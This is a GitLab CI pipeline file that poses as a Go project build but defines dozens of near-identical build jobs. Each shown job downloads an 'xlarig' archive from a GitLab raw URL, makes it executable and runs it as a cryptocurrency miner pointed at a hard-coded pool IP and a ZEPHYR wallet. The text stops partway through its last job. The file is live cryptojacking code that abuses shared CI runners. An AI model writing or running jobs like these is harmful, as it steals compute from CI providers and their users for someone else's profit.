image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_b:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_1b:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_c:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_d:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_e:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_f:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_g:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_h:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_i:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_j:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_k:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_l:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_m:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_n:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_o:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_p:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_q:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_r:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_s:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_t:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_u:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_v:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wuiuyhg:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wuyiuykhg:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wuiukjhm:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wytuiyk:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wyuuikk:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_whjghuk:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wkjkjhm:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wdsfghfdgff:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_hfwdfsdf:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wdsfgsdgsde:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wasdggffas:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wasdffas:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_asfggsdfw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_asdffdgggw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_asdfdddaw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wasfeert:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wsadfaa:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wsasasasa:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_waasss:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wsdfgfdhaa:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wdfsdgrer:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_ddfsgdssw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan


build_dfdsssw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_dfhhhhw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_dsfwertw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_dsfhgfddw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_sdgfdhgfw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_vcbfdgdfhw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wasdfgfgh:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wdsfdhfds:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wvdcbvc:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_dsfbsdfw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_fdhfdsdfw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_sdgfdghjdgfw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_sdfdshdw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_dgfhdfdw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_ghfgdhdw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_erhegfdw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_gdfhhw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_dfsdhhw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_werevsdr:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_dsfdsrew:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_sdfhdw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_asdwwqw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_sadfdg:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
